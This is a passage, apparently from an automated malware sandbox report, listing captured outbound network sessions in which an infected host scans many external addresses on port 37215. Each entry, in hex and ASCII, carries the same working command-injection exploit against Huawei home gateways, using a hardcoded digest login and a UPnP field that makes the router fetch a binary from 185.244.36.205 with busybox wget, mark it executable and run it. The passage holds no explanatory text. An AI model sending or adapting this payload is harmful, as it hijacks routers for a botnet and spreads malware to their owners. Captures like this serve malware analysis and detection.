                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              219192.168.2.1533040210.38.44.9137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.039163113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              220192.168.2.1555728190.18.104.13137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.039176941 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              221192.168.2.1556258197.222.209.21837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205154896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              222192.168.2.1536064222.4.216.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205193996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              223192.168.2.1560398122.13.2.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205215931 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              224192.168.2.154001641.44.121.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205226898 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              225192.168.2.1545374181.244.216.23137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205251932 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              226192.168.2.154673637.212.82.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205251932 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              227192.168.2.1532850157.55.37.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205306053 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              228192.168.2.154489263.242.190.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205312014 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
